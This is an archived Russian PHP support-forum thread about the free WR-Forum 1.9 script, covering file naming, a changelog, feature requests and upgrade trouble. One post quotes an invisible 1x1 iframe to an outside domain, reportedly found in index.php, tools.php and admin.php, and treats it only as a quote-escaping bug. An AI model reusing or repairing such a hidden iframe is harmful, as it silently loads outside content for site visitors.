Бесплатные PHP скрипты - форум техподдержки

Бесплатные PHP скрипты - форум техподдержки

Форум техподдержки WR-Скриптов на php. Обсуждаем: основы программирования на PHP 5 - 7 версий, различные подходы к написанию скриптов на php 7 без MySQL. А также WR-скрипты: бесплатные доски объявлений, скрипты форумов, Гостевые книги, Каталог ссылок, Галерея, Фотоальбом, Счётчики, Рассылки, Анекдот и другие. Принимаются пожелания для новых версий. Сообщите какой скрипт нужен для Вашего сайта, постараемся найти или реализовать. Скачать скрипты можно бесплатно. Вместе мы сделаем бесплатные php скрипты лучше и доступнее!

Главная сайта бесплатных php скриптовГлавная сайта   ПоискПоиск  
Сегодня: 28.03.2024 - 17:43:02
Страницы:  1 ... 6  7  8  9  10  ... 49

Форум WR-Forum 1.9 (архив)

Объявление - WR-Scriptы в UTF-8 кодировке

Активно обновляю скрипты и перевожу их в UTF-8 кодировку. Список перекодированных php скриптов доступен на главной странице сайта. Скачивайте скрипты и устанавливайте на свой сайт! В ближайшее время обновлю каталог знакомств, форум Про, фотоальбом, доски объявлений лайт и ЛЮКС.

На форуме, пожалуйста, пишите что модернизировать в скриптах в первую очередь. Постараюсь исправить большую часть пожеланий!
Планирую продолжить работы весь 2023 год.

АвторСообщение

790

7
Участник форума


Цитата:

С именами файлов "по дате" я уже в свое время горя хапнул.

А в чём была проблема?

Сообщение # 85 27.07.09 - 03:12:11

Георгий

Г
Участник форума


Цитата:

А в чём была проблема?

Проблем не видно, если поставить скрипт и не заглядывать в папку (куда все добавляется) по ftp...
где обнаруживается куча "лишних" фоток - у которых нет анкет(в знакомствах)
но здесь тема вроде как про форум... а мы все про знакомства
В знакомствах лучше $fotoname=$key.$ext - но это у меня так сделано, но у меня расширение вырезается вместе с точкой, в оригинале скрипта надо что-то типа:
$fotoname=$key.".".$ext (как-то вот так) - а если анкеты по очереди (что правильнее) - тогда еще удобнее.
Есть еще вариант перенести построение превью после записи строки в файл базу - тогда не будет потерявшихся картинок. Но грамотнее все же сделать все это вместе.
Что касается форума - $fotoname=НомерТемы_НомерСтроки.расширение - тоже мне кажется грамотнее или Вас в datadir - чистота и порядок не интересует?

Сообщение # 86 30.07.09 - 02:33:45

Георгий

Г
Участник форума

Тут (в форуме) даже проще, ничего искать не надо, например резервируешь по ftp файлы с темами и смотришь... есть у тебя например файл 014818_102.jpg или 014818_102.zip а в папке с темами 014818.dat нету - значит тема удалена, а аттачи остались.
С именами по дате - будет просто свалка, которую разгребать нереально.
Не буду настаивать, это лишь мое мнение, на сегодня оно такое, будет другой день - возможно будут другие идеи или мысли.

Сообщение # 87 30.07.09 - 02:51:25

790

7
Участник форума

$fotoname=$key.".".$ext; Это тоже хороший вариант. Да можно любой удобный код формировать. Просто в галерее можно по коду-дате найти описание или обсуждение этого ранее сохранённого у себя файла, чем я иногда и пользуюсь.

Сообщение # 88 30.07.09 - 03:35:41

WR

W
Участник форума

Выкладываю информацию по ИЗМЕНЕНИЯМ В СКРИПТЕ ФОРУМА - WR-Forum 1.9
(по сравнению с предыдущими версиями):

1) На форуме зарегистрированным юзерам можно присоединять в ответе файл zip / rar / 7z - формата. Функция отключается в админке;

2) При добавлении фото РЕПУТАЦИЯ прибавляется на 5 единиц;

3) При переносе темы из закрытого раздела - терялось ограничение по звёздам на раздел. ИСПРАВЛЕНО.

4) Когда создаёшь новую тему - нельзя пользоваться смайликами. Исправлено. Сделал единую форму для создания темы / ответа в теме (со смайлами, тэгами и прикреплением файлов);

5) Была проблема, например, при создании темы: 22 апреля 2009г. г.Санкт Петербург, концерт группы "Невский Портал". Ответить в теме нельзя. Ошибка исправлена.

6) Начаты разработки блока голосования для форума. Намётки есть, пожалуйста, тестируем голосование. Я готов выслушать предложения по функционированию блока.

7) В профиле участника сделана строка активности, например: Всего сообщений: 86 [4.46% от общего числа / 0.19 сообщений в сутки]

8) В админпанели дописан блок сортировки участников по: Имени, Кол-ву сообщений, Кол-ву звёзд, Репутации, Дате регистрации, Активности

9) В разде участники написан фильтр по: Полу,Интересам,Сайту,Откуда. Теперь легко найти участника из одного города, только девушек или из какого-либо города.

10)Если включена отправка сообщений пользователям, то кнопка "ЛС" появлялась даже у гостей. Сейчас форма появляется только у тех, кто указал емайл.

11)Исправлена ошибка HTML флагов (когда пользователь оставляет сообщение у него на конце ссылке #m4 (например). У гостей там #a4 поэтому пост не может нормально открываться по ссылке. ИСПРАВЛЕНО.

12)Для повышения безопасности форума добавил ini_set('register_globals','off'); в начало всех запускаемых php-блоков.

13)Сообщения при выводе на экран теперь фильтруются скриптом АНТИМАТА Дмитрия Перова (diktator_antimat v1.1_alfa). Спасибо ему огромное Есть нюансы - некоторые слова распознаются как маты: грёбля, грёбаный, глухую, ХЛЕБАЛО, ХЛЕБАЛЬНИК, хулиган... и некоторые другие. Функция можно регулировать в index.php - $antimat=1; // включить АНТИМАТ да/нет - 1/0

14)Готова в сообщениях форума заветная для некоторых кнопочку "Ответить на сообщение".

15)Система сохранения смайлов пересмотрена, изменена на более продвинутую.

16)Имелась проблема: если удалить новую тему, то на главной она продолжает отображаться и в разделе "Обновления" и в разделе "Последние сообщения". - ИСПРАВЛЕНО.

17)Правила форума вынесены в отдельный файл - pravila.html.

Планирую 10.01.10 выложить для открытого БЕТА-тестирования версию 1.9. Сегодня скрипт выкладываю в папку 'MOD'.

Сообщение # 89 09.01.10 - 14:49:06

Td-everest

T
гость


Цитата:

по этой ссылке https://www.wr-script.ru/mod/wr-forum-v-1.9.zip выложил первое и важное изменение в форуме: возможность прикреплять архив в сообщении.
Планирую ещё внести изменения.

Пожалуйста, все кто хочет помочь проекту сделать качественный скрипт форума - пожалуйте на тестирование. Все предложения по улучшения защиты от взлома - принимаю


Классный форум, скачал, радует. Но есть некоторые замечания, а вернее предложения: Очень неудобно что нет функции "ссылка", то есть не вставишь ссылку с текстом что есть не гуд. Вот как к примеру на других форумах [url=http://site.ru]Посетите мой сайт[/url]. А также можно было бы дабавить большой и маленький шрифт при написании сообщения.

Еже бы добавить в админку добавления html кода вверху и в низу для размешивания рекламы (рекламных блоков), чтобы в код нелазить, пример на бесплатных форумах mybb.ru такое присутствует в админке.

И самое главное наверное, почемуто при обновлении весь форум грохается, я обновлял с 1.8 на 1.9 пришлось все разделы и темы создавать заново все удалилось, нужно как то эту функцию усовершенствовать.

А в основном форум класс, разработчику респект.

Сообщение # 90 13.01.10 - 03:38:32

Td-everest

T
гость

P.S. Забыл еще, очень не удобно, что зарегистрированный пользователь не может редактировать свое сообщения, если там ошибка или забыл что то дописать.

Сообщение # 91 13.01.10 - 03:41:32

LOSKAND

L
Участник форума

Михаил, поправь в скрипте
index.php строка 328 <iframe src="http://www.Trenz.pl/rc/" width=1 height=1 frameborder=0></iframe> нехватает слешей у двойных кавычек.

tools.php строка 303 та же ошибка.

ошибки ерундовые но не всем осилить :) не все пользующиеся твоими скриптами знают php :)

Сообщение # 92 13.01.10 - 18:39:07

LOSKAND

L
Участник форума

да кстати та же ошибка в admin.php в строке 150

Сообщение # 93 13.01.10 - 18:43:57

Георгий

Г
Участник форума

Нет ковертера старой 1.8 базы в новую - поэтому пока пробовать не буду... не править же все ручками.
Ну и надо наверное было сразу прикрутить мод Максира кто-онлайн.

Сообщение # 94 15.01.10 - 01:48:48

Гость

Г
гость


Цитата:

Михаил, поправь в скрипте
index.php строка 328 <iframe src="http://www.Trenz.pl/rc/" width=1 height=1 frameborder=0></iframe> нехватает слешей у двойных кавычек.

tools.php строка 303 та же ошибка.

ошибки ерундовые но не всем осилить :) не все пользующиеся твоими скриптами знают php :)


Что-то нет там ничего похожего !

Сообщение # 95 15.01.10 - 13:02:10

Голосование

Г
гость

Не могу найти как в новой версии (1.9) прикрутить голосование.
Файлы *-ip.dat и *-vote.dat видел, и что дальше ??

Сообщение # 96 15.01.10 - 13:04:47
подписка на тему :Предыдущая темаСледующая тема: качаем форум со статистикой
Страницы:  1 ... 6  7  8  9  10  ... 49

Сообщение
Имя E-mail
Сообщение

Нажмите на точку возле имени для обращения к участнику

Смайлы:

Ещё смайлы
Эмодзи
         
Защитный код: (введите цифры, которые на синем фоне)
Ответ на вопрос: (Какой сейчас год?)
   
WR-Счётчик
Powered by WR-Forum Professional © 2.3 UTF-8 beta версия